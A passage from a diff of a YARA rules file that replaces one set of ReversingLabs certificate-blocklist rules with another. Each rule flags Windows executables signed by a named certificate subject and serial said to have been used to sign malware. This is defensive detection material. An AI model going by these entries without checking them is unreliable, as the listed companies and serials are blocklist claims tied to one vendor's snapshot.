"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13404-L13420" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "503429e737e8bdad735cf88e2bb2877d1f52b2c38be101a7a129c02db608a347" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7444-L7462" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "794dc27ff9b2588d3f2c31cdb83e53616c604aa41da7d8c895034e1cf9da5dd8" score = 75 quality = 90 tags = "INFO, FILE" @@ -18737,22 +38528,22 @@ rule REVERSINGLABS_Cert_Blocklist_73E2F34C9C2435F29Bbe0A3C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="73:e2:f3:4c:9c:24:35:f2:9b:be:0a:3c" and 1480312984<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "S-PRO d.o.o." and (pe.signatures[i].serial=="00:b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" or pe.signatures[i].serial=="b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85") and 1614556800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_68C457D7495D2A8D0D7B9042836135C2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a8ed2e72-d94e-5141-8ceb-181459a729ad" + id = "ab84282d-9c35-5e52-a117-1d85c03cc6f4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13422-L13438" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3eb63f75f258eec611fa4288302f0ce5e47149ca876265a4a4b65dc33313aaa6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7464-L7482" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0360c6760f1018f9388ef5639ab2306879134f33da12677f954fa31b8a71aa16" score = 75 quality = 90 tags = "INFO, FILE" @@ -18762,22 +38553,22 @@ rule REVERSINGLABS_Cert_Blocklist_68C457D7495D2A8D0D7B9042836135C2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="68:c4:57:d7:49:5d:2a:8d:0d:7b:90:42:83:61:35:c2" and 1476921600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LoL d.o.o." and (pe.signatures[i].serial=="00:fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" or pe.signatures[i].serial=="fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6") and 1614297600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6B72Ca367D40Fbef16E73E6Eba6A9A59 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Aa28C9Bd16D9D304F18Af223B27Bfa1E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e1cf9568-9a6a-58cb-81a4-25063ccc1ac7" + id = "facb8bba-a8cc-5b2a-9ef6-ba290cbf9b24" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13440-L13456" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2b20c16dafcd891c36b28b36093cd3ad3a15f3795f0f2adda61fb0db2835d02d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7484-L7502" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "feaa8d645eea46c7cbbba4ba86c92184df7515a50f1f905ab818c59079a0c96a" score = 75 quality = 90 tags = "INFO, FILE" @@ -18787,22 +38578,22 @@ rule REVERSINGLABS_Cert_Blocklist_6B72Ca367D40Fbef16E73E6Eba6A9A59 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="6b:72:ca:36:7d:40:fb:ef:16:e7:3e:6e:ba:6a:9a:59" and 1476748800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Tecno trade d.o.o." and (pe.signatures[i].serial=="00:aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e" or pe.signatures[i].serial=="aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e") and 1611705600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_736B7663D322533413F36E3E7E55F920 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_19Beff8A6C129663E5E8C18953Dc1F67 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1991779a-8b5d-5188-8a36-c8451923e88f" + id = "300d9e11-9283-500e-9716-5b628ef41853" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13458-L13474" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "44e86319106a4bf8edba6c1be2f90d68b3d1ef4591f0cc23921a0dc4da4a407b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7504-L7520" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0ec031c781ebad7447cfc53ce791aacc8f24e38f039c84e2ee547de64729ae76" score = 75 quality = 90 tags = "INFO, FILE" @@ -18812,22 +38603,22 @@ rule REVERSINGLABS_Cert_Blocklist_736B7663D322533413F36E3E7E55F920 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Net Technology" and pe.signatures[i].serial=="73:6b:76:63:d3:22:53:34:13:f3:6e:3e:7e:55:f9:20" and 1159488000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CULNADY LTD LTD" and pe.signatures[i].serial=="19:be:ff:8a:6c:12:96:63:e5:e8:c1:89:53:dc:1f:67" and 1608163200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_54A170102461Fdc967Acfafe4Bbbc7F0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_029685Cda1C8233D2409A31206F78F9F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d012df1d-5e85-57b4-8a79-5da91369a14a" + id = "f7894a48-459b-574f-9df3-8505578de42b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13476-L13492" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ddae18d566fa2fd077f51d0afff74fb8a8e525f88f23908c7402a4b2c092ad24" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7522-L7538" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d541ce73e5039541ea221f27cc4d033f0c477e41a148206c26cc39ae07c4caaa" score = 75 quality = 90 tags = "INFO, FILE" @@ -18837,22 +38628,22 @@ rule REVERSINGLABS_Cert_Blocklist_54A170102461Fdc967Acfafe4Bbbc7F0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="54:a1:70:10:24:61:fd:c9:67:ac:fa:fe:4b:bb:c7:f0" and 1476748800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KOTO TRADE, dru\\xC5\\xBEba za posredovanje, d.o.o." and pe.signatures[i].serial=="02:96:85:cd:a1:c8:23:3d:24:09:a3:12:06:f7:8f:9f" and 1612396800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0C501B8B113209C96C8119Cf7A6B8B79 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D609B6C95428954A999A8A99D4F198Af : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9ec73230-10cd-55ad-9ef7-56a875294cab" + id = "4ce9b2ce-5dda-5741-bd29-cadae44c3b28" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13494-L13510" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dca37fda83650979566fb6ffbedaf713955a3c7f03ecc62e2e155475b7ca00e4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7540-L7558" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a124f80d599051ecd7c17e6818d181ea018db14c9f0514bbcc5b677ba3656d65" score = 75 quality = 90 tags = "INFO, FILE" @@ -18862,22 +38653,22 @@ rule REVERSINGLABS_Cert_Blocklist_0C501B8B113209C96C8119Cf7A6B8B79 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="0c:50:1b:8b:11:32:09:c9:6c:81:19:cf:7a:6b:8b:79" and 1474329600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Fudl" and (pe.signatures[i].serial=="00:d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" or pe.signatures[i].serial=="d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af") and 1612828800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0300Ee4A4C52443147821A8186D04309 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D3356318924C8C42959Bf1D1574E6482 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "abccf84f-ba18-5644-897c-d23a228facff" + id = "36b12300-6535-5644-9145-9f532b49a421" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13512-L13528" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8476ece98427c1ffd99d820c25fe664397de2c393473f7d5ee0846d8d840fd9e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7560-L7578" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a672054a776d0715fc888578bcb559d24ef54b4c523f7d49a39ded2586c3140a" score = 75 quality = 90 tags = "INFO, FILE" @@ -18887,22 +38678,22 @@ rule REVERSINGLABS_Cert_Blocklist_0300Ee4A4C52443147821A8186D04309 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures[i].serial=="03:00:ee:4a:4c:52:44:31:47:82:1a:81:86:d0:43:09" and 1494892800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ADV TOURS d.o.o." and (pe.signatures[i].serial=="00:d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" or pe.signatures[i].serial=="d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82") and 1613001600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_202Cf8 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_31D852F5Fca1A5966B5Ed08A14825C54 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1c442ed6-a48a-52f4-b345-300428ec9c76" + id = "362a6eb7-f49e-502b-9870-522aea13e04b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13530-L13546" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "671a4b522761fdff75d1c0c608e8cfb21c7ab538c8c30c8620315bc58ed358e6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7580-L7596" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8c98b856d53e6862e94042bb133f5739bddcec2e208e43961b23e244584c6ee4" score = 75 quality = 90 tags = "INFO, FILE" @@ -18912,22 +38703,22 @@ rule REVERSINGLABS_Cert_Blocklist_202Cf8 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DATALINE LTD." and pe.signatures[i].serial=="20:2c:f8" and 1087841761<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BBT KLA d.o.o." and pe.signatures[i].serial=="31:d8:52:f5:fc:a1:a5:96:6b:5e:d0:8a:14:82:5c:54" and 1612396800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6651Cc8B4850D4Dec61961503Ea7956B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_17D99Cc2F5B29522D422332E681F3E18 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "88679114-9c85-5810-af21-d5c2a8dc759e" + id = "0d0a58a4-353d-51f9-a739-a135d77357c9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13548-L13564" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "29bfe9c8b340b55a9daa2644e8d55b2b783cc95c85541732e6e0decca8c10ff6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7598-L7614" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "55cc1634cdc5209d68b98fdb0d9e97e0a34346cdcb10f243d13217cda01195f1" score = 75 quality = 90 tags = "INFO, FILE" @@ -18937,22 +38728,22 @@ rule REVERSINGLABS_Cert_Blocklist_6651Cc8B4850D4Dec61961503Ea7956B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NUSAAPPINSTALL(APPS INSTALLER S.L.)" and pe.signatures[i].serial=="66:51:cc:8b:48:50:d4:de:c6:19:61:50:3e:a7:95:6b" and 1436175828<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PKV Trading ApS" and pe.signatures[i].serial=="17:d9:9c:c2:f5:b2:95:22:d4:22:33:2e:68:1f:3e:18" and 1613088000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_25Bef28467E4750331D2F403458113B8 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6A568F85De2061F67Ded98707D4988Df : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a97723cb-7814-5f08-af94-6244c1cf4145" + id = "962c3096-2c3d-5137-9637-b45d00b2ee9b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13566-L13582" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dc59fdecf60f3781e92cfe8469be2e0c1cb1cfdd3e9f9757d159667437cb37f5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7616-L7632" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "793be308a4df55c3b325e1ee3185159c4155f6dfabc311216d3763bd43680bd4" score = 75 quality = 90 tags = "INFO, FILE" @@ -18962,22 +38753,22 @@ rule REVERSINGLABS_Cert_Blocklist_25Bef28467E4750331D2F403458113B8 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="25:be:f2:84:67:e4:75:03:31:d2:f4:03:45:81:13:b8" and 1474156800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Apladis" and pe.signatures[i].serial=="6a:56:8f:85:de:20:61:f6:7d:ed:98:70:7d:49:88:df" and 1613001600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0296Cf3314F434C5B74D0C3E36616Dd1 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_038Fc745523B41B40D653B83Aa381B80 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ae7d8c3c-0ac8-5ea5-8013-97ccb2ace4e4" + id = "3f7f9d58-3a7a-5f84-bf6e-795a9c8bcd38" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13584-L13600" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "acf3b7460c79fa71c1b131b26a40bbc286c9da0a5fe7071bbe8b386a3ca91de4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7634-L7650" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "016ca6dcb5c7c56c80e4486b84d97fb3869a959ef3e8392e4376a0a0de06092f" score = 75 quality = 90 tags = "INFO, FILE" @@ -18987,22 +38778,22 @@ rule REVERSINGLABS_Cert_Blocklist_0296Cf3314F434C5B74D0C3E36616Dd1 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="02:96:cf:33:14:f4:34:c5:b7:4d:0c:3e:36:61:6d:d1" and 1474934400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Optima" and pe.signatures[i].serial=="03:8f:c7:45:52:3b:41:b4:0d:65:3b:83:aa:38:1b:80" and 1606143708<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_045D57D63E13775C8F812E1864797F5A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_30Af0D0E6D8201A5369664C5Ebbb010F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c2c37ddc-51bc-58da-b770-df97aebca01d" + id = "aaa31642-a0f4-5652-b3cd-c81cfb1ab127" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13602-L13618" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d3e61e9a43f5b17ebb08b71dc39648d1f20273a18214f39605f365f9f0f72c10" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7652-L7668" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "018e5a0fbeeaded2569b83e2f91230e0055a5ffa2059b7a064a5c2eda55ed2de" score = 75 quality = 90 tags = "INFO, FILE" @@ -19012,22 +38803,22 @@ rule REVERSINGLABS_Cert_Blocklist_045D57D63E13775C8F812E1864797F5A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Mei" and pe.signatures[i].serial=="04:5d:57:d6:3e:13:77:5c:8f:81:2e:18:64:79:7f:5a" and 1485043200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3N-\\xC5\\xA0PORT podjetje za in\\xC5\\xBEeniring, storitve in trgovino d.o.o." and pe.signatures[i].serial=="30:af:0d:0e:6d:82:01:a5:36:96:64:c5:eb:bb:01:0f" and 1613433600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6D633Df9Bb6015Fc3Ecea99Dff309Ee7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ac0A7B9420B369Af3Ddb748385B981 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b85bf9c5-f438-5973-83ab-926e44cf2298" + id = "82d6c0f5-80d1-5003-a5c9-9eadd9654460" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13620-L13636" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "84e2f427ee79b47db8d0e5f1e2217a7e1c1ea64047e01b4ea6db69f529501f36" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7670-L7688" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2bc31eaa64be487cb85873a64b7462d90d1c28839def070ce5db7ae555383421" score = 75 quality = 90 tags = "INFO, FILE" @@ -19037,22 +38828,22 @@ rule REVERSINGLABS_Cert_Blocklist_6D633Df9Bb6015Fc3Ecea99Dff309Ee7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="6d:63:3d:f9:bb:60:15:fc:3e:ce:a9:9d:ff:30:9e:e7" and 1474156800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Tochka" and (pe.signatures[i].serial=="00:ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" or pe.signatures[i].serial=="ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81") and 1604620800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_22E2A66E63B8Cb4Ec6989Bf7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C167F04B338B1E8747B92C2197403C43 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5c028a6c-890c-54f1-aea2-ac04ce654907" + id = "0bf561ac-0283-557f-a685-4603e2b58273" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13638-L13654" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2099c508d1fd986f34f14aa396a5aaa136e2cdd2226099acdca9c14f6f6342eb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7690-L7708" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8e0a11efc739baefe23a3d77e4eefc9dc23c74821c91fc219822dbc5dbb468b1" score = 75 quality = 90 tags = "INFO, FILE" @@ -19062,22 +38853,22 @@ rule REVERSINGLABS_Cert_Blocklist_22E2A66E63B8Cb4Ec6989Bf7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sivi Technology Limited" and pe.signatures[i].serial=="22:e2:a6:6e:63:b8:cb:4e:c6:98:9b:f7" and 1466995365<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORTUNE STAR TRADING, INC." and (pe.signatures[i].serial=="00:c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" or pe.signatures[i].serial=="c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43") and 1604361600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_654B406De388Ec2Aec253Ff2Ba4C4Bbd : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_9272607Cfc982B782A5D36C4B78F5E7B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9820112d-d59b-57e7-ae78-7b427f70d529" + id = "e3ad8f20-d12f-54e9-a6da-7aad28a10287" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = 